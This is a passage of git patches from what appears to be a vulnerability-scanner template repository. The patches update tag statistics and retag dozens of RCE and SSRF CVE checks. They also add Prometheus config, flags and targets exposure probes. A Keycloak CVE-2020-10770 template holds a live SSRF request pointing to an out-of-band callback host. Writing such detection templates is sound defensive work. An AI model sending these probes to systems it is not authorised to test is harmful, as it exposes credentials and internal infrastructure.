1 | | | | | | | | | +| twitter | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| photo | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| directions | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| hubspot | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| elasticsearch | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index e941b1bca2..7c569d4d19 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | -| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | -| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| cve | 832 | daffainfo | 288 | cves | 836 | info | 750 | http | 2211 | +| lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | +| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 270 | medium | 475 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | -| rce | 212 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | +| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | +| rce | 214 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 197 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 175 | princechaddha | 67 | default-logins | 60 | | | | | +| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | From 7bf2b8377818af0789011cb668bf056be9ed3f46 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 15:30:47 +0000 Subject: [PATCH 3004/4083] Auto README Update [Mon Oct 18 15:30:47 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e60fe58f03..7c8bd1cd86 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 164 | madrobot | 63 | file | 50 | | | | | -**176 directories, 2376 files**. +**176 directories, 2381 files**. From fc81dd3b247d05a48c90b978bf0c0e7b03ee30ac Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 18 Oct 2021 21:03:29 +0530 Subject: [PATCH 3005/4083] Update CVE-2020-10770.yaml --- cves/2020/CVE-2020-10770.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-10770.yaml b/cves/2020/CVE-2020-10770.yaml index 31d08fdaa4..f43f476f60 100644 --- a/cves/2020/CVE-2020-10770.yaml +++ b/cves/2020/CVE-2020-10770.yaml @@ -8,17 +8,19 @@ info: reference: - https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html - https://www.exploit-db.com/exploits/50405 - tags: keycloak,ssrf,oob + - https://nvd.nist.gov/vuln/detail/CVE-2020-10770 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.30 cve-id: CVE-2020-10770 cwe-id: CWE-601 + tags: keycloak,ssrf,oob,cve,cve2020 requests: - method: GET path: - '{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/' + matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction From aec00d0d1137fed4cf3f6d3e76be666211ff816b Mon Sep 17 00:00:00 2001 From: opp? <50470310+oppsec@users.noreply.github.com> Date: Mon, 18 Oct 2021 13:38:04 -0300 Subject: [PATCH 3006/4083] add more tags to keycloak json file template --- exposures/files/keycloak-json.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/keycloak-json.yaml b/exposures/files/keycloak-json.yaml index da1532a209..5a557e754a 100644 --- a/exposures/files/keycloak-json.yaml +++ b/exposures/files/keycloak-json.yaml @@ -3,7 +3,7 @@ info: name: Keycloak Json File author: oppsec severity: info - tags: exposure + tags: exposure,keycloak,config requests: - method: GET From c7efad4b58c8f3e818235cf3bc1d508a341b9a95 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 18 Oct 2021 13:35:04 -0500 Subject: [PATCH 3007/4083] Create prometheus-config-endpoint.yaml --- .../configs/prometheus-config-endpoint.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposures/configs/prometheus-config-endpoint.yaml diff --git a/exposures/configs/prometheus-config-endpoint.yaml b/exposures/configs/prometheus-config-endpoint.yaml new file mode 100644 index 0000000000..4529496b0d --- /dev/null +++ b/exposures/configs/prometheus-config-endpoint.yaml @@ -0,0 +1,26 @@ +id: prometheus-config-endpoint + +info: + name: Exposure of sensitive operational information via Prometheus config API endpoint + author: geeknik + description: The config endpoint returns the loaded Prometheus configuration file. This file also contains addresses of targets and alerting/discovery services alongside the credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder (although this still leaks the username). + reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ + severity: high + tags: prometheus,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/status/config" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + words: + - "job_name:" + - "params:" + - "module:" + - "targets:" + condition: and From a8a063d14c8d9504b20a2e44c47a7d7a885ac514 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 18 Oct 2021 13:36:27 -0500 Subject: [PATCH 3008/4083] Create prometheus-flags-endpoint.yaml --- .../configs/prometheus-flags-endpoint.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposures/configs/prometheus-flags-endpoint.yaml diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml new file mode 100644 index 0000000000..e3471282be --- /dev/null +++ b/exposures/configs/prometheus-flags-endpoint.yaml @@ -0,0 +1,24 @@ +id: prometheus-flags-endpoint + +info: + name: Exposure of sensitive operational information via Prometheus flags API endpoint + author: geeknik + description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. + reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ + severity: medium + tags: prometheus,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/status/config" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + words: + - '"data":' + - '"config.file":' + condition: and From 0f20469e96bf1f83fddb0a9ac62e503e34c7328f Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 18 Oct 2021 13:43:36 -0500 Subject: [PATCH 3009/4083] Update prometheus-flags-endpoint.yaml --- exposures/configs/prometheus-flags-endpoint.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml index e3471282be..bbb7d436bf 100644 --- a/exposures/configs/prometheus-flags-endpoint.yaml +++ b/exposures/configs/prometheus-flags-endpoint.yaml @@ -11,7 +11,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/api/v1/status/config" + - "{{BaseURL}}/api/v1/status/flags" matchers-condition: and matchers: From 72805491d0ccef219a4eda007bf6c560ecdd5141 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 18 Oct 2021 13:44:55 -0500 Subject: [PATCH 3010/4083] Create prometheus-targets-endpoint.yaml --- .../configs/prometheus-targets-endpoint.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/configs/prometheus-targets-endpoint.yaml diff --git a/exposures/configs/prometheus-targets-endpoint.yaml b/exposures/configs/prometheus-targets-endpoint.yaml new file mode 100644 index 0000000000..9d29d621c6 --- /dev/null +++ b/exposures/configs/prometheus-targets-endpoint.yaml @@ -0,0 +1,25 @@ +id: prometheus-targets-endpoint + +info: + name: Exposure of sensitive operational information via Prometheus targets API endpoint + author: geeknik + description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer’s knowledge. + reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ + severity: high + tags: prometheus,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/targets" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + words: + - "Endpoint" + - "State" + - "Labels" + condition: and From 86a8332187c9535953c059bbc4394a06bd2ee32d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 18 Oct 2021 13:51:11 -0500 Subject: [PATCH 3011/4083] Update prometheus-flags-endpoint.yaml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit adding regex extractor to alert if `optional` Prometheus management API is enabled as per the linked reference article. 👍🏻 --- exposures/configs/prometheus-flags-endpoint.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml index bbb7d436bf..f5a8d3a980 100644 --- a/exposures/configs/prometheus-flags-endpoint.yaml +++ b/exposures/configs/prometheus-flags-endpoint.yaml @@ -22,3 +22,9 @@ requests: - '"data":' - '"config.file":' condition: and + + extractors: + - type: regex + name: web_admin_enabled + regex: + - '\"web\.enable\-admin\-api\"\: \"true\"' From eac799774d2f870ae587ee493307accdd2320ab7 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 18 Oct 2021 14:36:49 -0500 Subject: [PATCH 3012/4083] Update prometheus-flags-endpoint.yaml --- exposures/configs/prometheus-flags-endpoint.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml index f5a8d3a980..c249c865f3 100644 --- a/exposures/configs/prometheus-flags-endpoint.yaml +++ b/exposures/configs/prometheus-flags-endpoint.yaml @@ -22,7 +22,7 @@ requests: - '"data":' - '"config.file":' condition: and - + extractors: - type: regex name: web_admin_enabled From 33badb66d116333fcce3ef9115ce4e4803e96f5c Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 19 Oct 2021 02:10:26 +0530 Subject: [PATCH 3013/4083] oob tags update --- cves/2014/CVE-2014-4210.yaml | 2 +- cves/2015/CVE-2015-7450.yaml | 2 +- cves/2015/CVE-2015-8813.yaml | 2 +- cves/2017/CVE-2017-10271.yaml | 2 +- cves/2017/CVE-2017-12629.yaml | 2 +- cves/2017/CVE-2017-18638.yaml | 2 +- cves/2017/CVE-2017-3506.yaml | 2 +- cves/2017/CVE-2017-9506.yaml | 2 +- cves/2018/CVE-2018-1000600.yaml | 2 +- cves/2018/CVE-2018-10818.yaml | 2 +- cves/2018/CVE-2018-15517.yaml | 2 +- cves/2018/CVE-2018-16167.yaml | 2 +- cves/2019/CVE-2019-0193.yaml | 2 +- cves/2019/CVE-2019-17558.yaml | 2 +- cves/2019/CVE-2019-18394.yaml | 2 +- cves/2019/CVE-2019-2616.yaml | 2 +- cves/2019/CVE-2019-2767.yaml | 2 +- cves/2019/CVE-2019-8451.yaml | 2 +- cves/2020/CVE-2020-10770.yaml | 2 +- cves/2020/CVE-2020-13117.yaml | 2 +- cves/2020/CVE-2020-25223.yaml | 2 +- cves/2020/CVE-2020-25506.yaml | 2 +- cves/2020/CVE-2020-26919.yaml | 2 +- cves/2020/CVE-2020-28188.yaml | 2 +- cves/2020/CVE-2020-28871.yaml | 2 +- cves/2020/CVE-2020-28976.yaml | 2 +- cves/2020/CVE-2020-35713.yaml | 2 +- cves/2020/CVE-2020-6308.yaml | 2 +- cves/2020/CVE-2020-7247.yaml | 2 +- cves/2020/CVE-2020-7796.yaml | 2 +- cves/2020/CVE-2020-8813.yaml | 2 +- cves/2021/CVE-2021-1497.yaml | 2 +- cves/2021/CVE-2021-1498.yaml | 2 +- cves/2021/CVE-2021-21287.yaml | 2 +- cves/2021/CVE-2021-22214.yaml | 2 +- cves/2021/CVE-2021-24472.yaml | 2 +- cves/2021/CVE-2021-26855.yaml | 2 +- cves/2021/CVE-2021-31755.yaml | 2 +- cves/2021/CVE-2021-32305.yaml | 2 +- cves/2021/CVE-2021-32819.yaml | 2 +- cves/2021/CVE-2021-33357.yaml | 2 +- cves/2021/CVE-2021-33544.yaml | 2 +- cves/2021/CVE-2021-3577.yaml | 2 +- cves/2021/CVE-2021-36380.yaml | 2 +- cves/2021/CVE-2021-40438.yaml | 2 +- iot/targa-camera-ssrf.yaml | 2 +- misconfiguration/cloudflare-image-ssrf.yaml | 2 +- misconfiguration/linkerd-ssrf-detect.yaml | 2 +- misconfiguration/ssrf-via-oauth-misconfig.yaml | 2 +- vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml | 2 +- vulnerabilities/generic/oob-header-based-interaction.yaml | 2 +- vulnerabilities/generic/oob-param-based-interaction.yaml | 2 +- vulnerabilities/generic/request-based-interaction.yaml | 2 +- vulnerabilities/other/hashicorp-consul-rce.yaml | 2 +- vulnerabilities/other/mirai-unknown-rce.yaml | 2 +- vulnerabilities/other/netgear-wnap320-rce.yaml | 2 +- vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml | 2 +- vulnerabilities/other/sar2html-rce.yaml | 2 +- vulnerabilities/other/visual-tools-dvr-rce.yaml | 2 +- vulnerabilities/other/zimbra-preauth-ssrf.yaml | 2 +- vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml | 2 +- 69 files changed, 69 insertions(+), 69 deletions(-) diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml index df8ec6f136..96c90f1486 100644 --- a/cves/2014/CVE-2014-4210.yaml +++ b/cves/2014/CVE-2014-4210.yaml @@ -4,7 +4,7 @@ info: name: Weblogic SSRF in SearchPublicRegistries.jsp author: princechaddha severity: medium - tags: cve,cve2014,weblogic,oracle,ssrf,oob + tags: cve,cve2014,weblogic,oracle,ssrf,oast reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index 04918de4f0..8f542a5c14 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml @@ -9,7 +9,7 @@ info: - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - tags: cve,cve2015,websphere,deserialization,rce,oob + tags: cve,cve2015,websphere,deserialization,rce,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2015/CVE-2015-8813.yaml b/cves/2015/CVE-2015-8813.yaml index d9b0c56e21..2651aa807d 100644 --- a/cves/2015/CVE-2015-8813.yaml +++ b/cves/2015/CVE-2015-8813.yaml @@ -8,7 +8,7 @@ info: reference: - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 - tags: cve,cve2015,ssrf,oob + tags: cve,cve2015,ssrf,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N cvss-score: 8.20 diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 16be3163ce..86a37f5d34 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -8,7 +8,7 @@ info: reference: - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc - tags: cve,cve2017,rce,oracle,weblogic,oob + tags: cve,cve2017,rce,oracle,weblogic,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.50 diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml index 653122ae26..bcfeceeb5f 100644 --- a/cves/2017/CVE-2017-12629.yaml +++ b/cves/2017/CVE-2017-12629.yaml @@ -4,7 +4,7 @@ info: name: Apache Solr <= 7.1 XML entity injection author: dwisiswant0 severity: critical - tags: cve,cve2017,solr,apache,oob,xxe + tags: cve,cve2017,solr,apache,oast,xxe reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-12629 - https://twitter.com/honoki/status/1298636315613974532 diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml index 8c240d1426..47bbe28842 100644 --- a/cves/2017/CVE-2017-18638.yaml +++ b/cves/2017/CVE-2017-18638.yaml @@ -10,7 +10,7 @@ info: - https://github.com/graphite-project/graphite-web/issues/2008 - https://github.com/advisories/GHSA-vfj6-275q-4pvm - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 - tags: cve,cve2017,graphite,ssrf,oob + tags: cve,cve2017,graphite,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml index 0e0bff68e3..b19b9142da 100644 --- a/cves/2017/CVE-2017-3506.yaml +++ b/cves/2017/CVE-2017-3506.yaml @@ -5,7 +5,7 @@ info: author: pdteam description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. severity: high - tags: cve,cve2017,weblogic,oracle,rce,oob + tags: cve,cve2017,weblogic,oracle,rce,oast reference: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index d97ed4f5c8..a76d387e75 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -9,7 +9,7 @@ info: - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - https://ecosystem.atlassian.net/browse/OAUTH-344 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 - tags: cve,cve2017,atlassian,jira,ssrf,oob + tags: cve,cve2017,atlassian,jira,ssrf,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 diff --git a/cves/2018/CVE-2018-1000600.yaml b/cves/2018/CVE-2018-1000600.yaml index b244248f80..e87764fc8b 100644 --- a/cves/2018/CVE-2018-1000600.yaml +++ b/cves/2018/CVE-2018-1000600.yaml @@ -8,7 +8,7 @@ info: - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ author: geeknik severity: high - tags: cve,cve2018,jenkins,ssrf,oob + tags: cve,cve2018,jenkins,ssrf,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.80 diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index f134dc0cba..154d5bc397 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 - tags: cve,cve2018,lg-nas,rce,oob + tags: cve,cve2018,lg-nas,rce,oast requests: - raw: diff --git a/cves/2018/CVE-2018-15517.yaml b/cves/2018/CVE-2018-15517.yaml index ffe7f7ad24..a6c7089cc6 100644 --- a/cves/2018/CVE-2018-15517.yaml +++ b/cves/2018/CVE-2018-15517.yaml @@ -7,7 +7,7 @@ info: - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt author: gy741 severity: high - tags: cve,cve2018,dlink,ssrf,oob + tags: cve,cve2018,dlink,ssrf,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N cvss-score: 8.60 diff --git a/cves/2018/CVE-2018-16167.yaml b/cves/2018/CVE-2018-16167.yaml index da711614f9..905c2aa927 100644 --- a/cves/2018/CVE-2018-16167.yaml +++ b/cves/2018/CVE-2018-16167.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/49918 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 - tags: cve,cve2018,logontracer,rce,oob + tags: cve,cve2018,logontracer,rce,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml index 84af6836bc..9290b55d0a 100644 --- a/cves/2019/CVE-2019-0193.yaml +++ b/cves/2019/CVE-2019-0193.yaml @@ -9,7 +9,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-0193 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 - https://paper.seebug.org/1009/ - tags: cve,cve2019,apache,rce,solr,oob + tags: cve,cve2019,apache,rce,solr,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.20 diff --git a/cves/2019/CVE-2019-17558.yaml b/cves/2019/CVE-2019-17558.yaml index dc6c7b9786..836b3efbdf 100644 --- a/cves/2019/CVE-2019-17558.yaml +++ b/cves/2019/CVE-2019-17558.yaml @@ -4,7 +4,7 @@ info: author: pikpikcu,madrobot severity: high reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558 - tags: cve,cve2019,apache,rce,solr,oob + tags: cve,cve2019,apache,rce,solr,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.50 diff --git a/cves/2019/CVE-2019-18394.yaml b/cves/2019/CVE-2019-18394.yaml index 3c50ca751a..c50b26350b 100644 --- a/cves/2019/CVE-2019-18394.yaml +++ b/cves/2019/CVE-2019-18394.yaml @@ -8,7 +8,7 @@ info: reference: - https://swarm.ptsecurity.com/openfire-admin-console/ - https://github.com/igniterealtime/Openfire/pull/1497 - tags: cve,cve2019,ssrf,openfire,oob + tags: cve,cve2019,ssrf,openfire,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2019/CVE-2019-2616.yaml b/cves/2019/CVE-2019-2616.yaml index e8c42482e2..cc8c1eda41 100644 --- a/cves/2019/CVE-2019-2616.yaml +++ b/cves/2019/CVE-2019-2616.yaml @@ -8,7 +8,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - https://www.exploit-db.com/exploits/46729 - tags: cve,cve2019,oracle,xxe,oob + tags: cve,cve2019,oracle,xxe,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.20 diff --git a/cves/2019/CVE-2019-2767.yaml b/cves/2019/CVE-2019-2767.yaml index 48d47fda95..bf1dcb703f 100644 --- a/cves/2019/CVE-2019-2767.yaml +++ b/cves/2019/CVE-2019-2767.yaml @@ -8,7 +8,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - https://www.exploit-db.com/exploits/46729 - tags: cve,cve2019,oracle,xxe,oob + tags: cve,cve2019,oracle,xxe,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.20 diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index 7fe324b099..9233fe022b 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -9,7 +9,7 @@ info: - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in - https://jira.atlassian.com/browse/JRASERVER-69793 - https://hackerone.com/reports/713900 - tags: cve,cve2019,atlassian,jira,ssrf,oob + tags: cve,cve2019,atlassian,jira,ssrf,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.50 diff --git a/cves/2020/CVE-2020-10770.yaml b/cves/2020/CVE-2020-10770.yaml index f43f476f60..6e92956a36 100644 --- a/cves/2020/CVE-2020-10770.yaml +++ b/cves/2020/CVE-2020-10770.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.30 cve-id: CVE-2020-10770 cwe-id: CWE-601 - tags: keycloak,ssrf,oob,cve,cve2020 + tags: keycloak,ssrf,oast,cve,cve2020 requests: - method: GET diff --git a/cves/2020/CVE-2020-13117.yaml b/cves/2020/CVE-2020-13117.yaml index 481f68259a..98efc7ace5 100644 --- a/cves/2020/CVE-2020-13117.yaml +++ b/cves/2020/CVE-2020-13117.yaml @@ -7,7 +7,7 @@ info: description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected. reference: - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html - tags: cve,cve2020,wavlink,rce,oob + tags: cve,cve2020,wavlink,rce,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml index adcb65ac0a..3e1e320fe2 100644 --- a/cves/2020/CVE-2020-25223.yaml +++ b/cves/2020/CVE-2020-25223.yaml @@ -7,7 +7,7 @@ info: description: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 